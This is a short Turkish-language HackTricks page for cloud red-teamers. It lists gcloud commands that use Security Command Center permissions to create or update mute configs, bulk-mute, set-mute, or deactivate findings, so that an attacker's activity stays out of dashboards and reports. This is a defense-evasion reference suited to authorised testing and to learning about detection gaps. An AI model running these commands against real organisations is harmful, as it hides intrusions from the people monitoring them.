GCP - Güvenlik Post Exploitation

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

Güvenlik

Daha fazla bilgi için bakınız:

GCP - Security Enum

securitycenter.muteconfigs.create

Bir muteconfig oluşturarak saldırganı tespit edebilecek findings’ların oluşmasını engelleyin:

Muteconfig Oluştur ```bash # Create Muteconfig gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\"" ```

securitycenter.muteconfigs.update

Bir saldırganı tespit edebilecek bulguların oluşturulmasını bir muteconfig güncelleyerek engelleyin:

Muteconfig Güncelle ```bash # Update Muteconfig gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\"" ```

securitycenter.findings.bulkMuteUpdate

Filtreye göre bulguları susturma:

Filtreye göre toplu susturma ```bash # Mute based on a filter gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\"" ```

Sessize alınmış bir finding SCC gösterge tablosunda ve raporlarda görünmez.

securitycenter.findings.setMute

Kaynağa veya diğer özelliklere göre finding’leri sessize al…

Finding'i sessize al ```bash gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED ```

securitycenter.findings.update

Bir bulguyu hatalı bilgi olduğunu belirtmek için güncelle:

Bulgu durumunu güncelle ```bash gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE ```

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
Az Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin